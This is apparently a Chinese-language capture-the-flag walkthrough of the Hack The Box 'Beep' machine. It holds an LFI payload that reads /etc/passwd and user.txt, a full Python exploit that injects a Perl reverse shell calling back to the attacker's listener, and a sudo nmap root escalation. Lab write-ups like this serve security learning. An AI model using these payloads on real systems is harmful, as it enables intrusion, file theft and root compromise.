免责声明
本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。服务探测
┌──(rootkali)-[~/htb/Beep]
└─# nmap -sV -Pn 10.10.10.7 -p-130 ?
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-09 01:07 EST
Nmap scan report for 10.10.10.7
Host is up (0.33s latency).
Not shown: 65519 closed ports
PORTSTATE SERVICEVERSION
22/tcpopensshOpenSSH 4.3 (protocol 2.0)
25/tcpopensmtpPostfix smtpd
80/tcpopenhttpApache httpd 2.2.3
110/tcpopenpop3Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcpopenrpcbind2 (RPC #100000)
143/tcpopenimapCyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcpopenssl/https?
879/tcpopenstatus1 (RPC #100024)
993/tcpopenssl/imapCyrus imapd
995/tcpopenpop3Cyrus pop3d
3306/tcpopenmysqlMySQL (unauthorized)
4190/tcpopensieveCyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcpopenupnotifyp?
4559/tcpopenhylafaxHylaFAX 4.3.10
5038/tcpopenasteriskAsterisk Call Manager 1.1
10000/tcp openhttpMiniServ 1.570 (Webmin httpd)
Service Info: Hosts:beep.localdomain, 127.0.0.1, example.com, localhost;
OS: UnixService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1565.01 seconds开了好多端口,现实当中端口越多漏洞越多,但是具体到这些靶机,很可能意味着很多兔子洞,所以枚举的时候一定要小心分辨
先用gobuster爆破80端口目录看看,需要主要要加
-k跳过ssl验证目录爆破
┌──(rootkali)-[~/dirsearch]
└─# gobuster dir -w /usr/share/wordlists/Web-Content/common.txt -k -u https://10.10.10.7/ --wildcard
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:https://10.10.10.7/
[+] Method:GET
[+] Threads:10
[+] Wordlist:/usr/share/wordlists/Web-Content/common.txt
[+] Negative Status codes:404
[+] User Agent:gobuster/3.1.0
[+] Timeout:10s
===============================================================
2021/12/09 02:53:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta(Status: 403) [Size: 282]
/.htaccess(Status: 403) [Size: 287]
/.htpasswd(Status: 403) [Size: 287]
/admin(Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/cgi-bin/(Status: 403) [Size: 286]
Progress: 1041 / 4686 (22.22%)[ERROR] 2021/12/09 02:56:30 [!] Get "https://10.10.10.7/certs": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/configs(Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/favicon.ico(Status: 200) [Size: 894]
/help(Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
/images(Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/index.php(Status: 200) [Size: 1785]
/lang(Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
/libs(Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]
/mail(Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
/modules(Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/panel(Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
/robots.txt(Status: 200) [Size: 28]
/static(Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
Progress: 3959 / 4686 (84.49%)[ERROR] 2021/12/09 03:02:55 [!] Get "https://10.10.10.7/status": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 3986 / 4686 (85.06%)[ERROR] 2021/12/09 03:03:04 [!] Get "https://10.10.10.7/style_captcha": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 4036 / 4686 (86.13%)[ERROR] 2021/12/09 03:03:19 [!] Get "https://10.10.10.7/swfobject.js": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/themes(Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
/var(Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
80端口的服务跑着一个叫
elastix的cms,谷歌了一下这个cms存在一个LFI漏洞,参考这个exp验证POC如下
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action页面打印
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory
owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus
IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.ok,验证漏洞存在。由上面打印可知存在用户:asterisk,spamfilter,fanis
用下面payload可以读到user.txt
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//home/fanis/user.txt%00&module=Accounts&actionLFI一般要结合上传漏洞或者文件解析漏洞才能拿到webshell
但是我找了一大圈一是没有找到上传入口,二是我找不到apache的access_log文件
初始shell 然后继续搜索这个cms的利用漏洞,发现还存在一个rce,在github上找到这个利用脚本
不过这个脚本我本地执行时要加上这两行:
ctx.set_ciphers('HIGH:!DH:!aNULL')
ctx.set_ciphers('DEFAULT@SECLEVEL=1')【【HTB】Beep(LFI,RCE,sudo特权(nmap))】不然可能会报ssl错误
完整exp如下:
#exploit modified by infosecjunky
#https://infosecjunky.comimport urllib2
import sslrhost="10.10.10.7"
lhost="10.10.14.16"
lport=4444
extension="233"ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.set_ciphers('HIGH:!DH:!aNULL')
ctx.set_ciphers('DEFAULT@SECLEVEL=1')# Reverse shell payloadurl = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'urllib2.urlopen(url,context=ctx)拿到webshell
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.7] 49229
id
uid=100(asterisk) gid=101(asterisk)
whoami
asterisk
提权 python切换tty
python -c 'import pty; pty.spawn("/bin/sh")'查看sudo 特权
sh-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
开了好多权限,选择nmap提权到root
sh-3.2$ sudo /usr/bin/nmap --interactive
sudo /usr/bin/nmap --interactiveStarting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h for help
nmap> !sh
!sh
sh-3.2# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# whoami
whoami
root
sh-3.2#
总结 很简单的靶机,初始shell那里花了些功夫,找了好久access.log
root以后发现在这个位置:
sh-3.2# find / -name access_log
find / -name access_log
/var/log/httpd/access_log然后web账号是没有读权限的
sh-3.2$ id
id
uid=100(asterisk) gid=101(asterisk)
sh-3.2$ cat /var/log/httpd/access_log
cat /var/log/httpd/access_log
cat: /var/log/httpd/access_log: Permission denied要注意这些兔子洞。
推荐阅读
- 隧道搭建|DNS隧道技术
- linux|给docker中的ubuntu系统安装桌面程序
- 渗透测试|如何入门CTF()
- vulhub-serial-php反序列化靶机实战
- 在linux上安装Docker Compose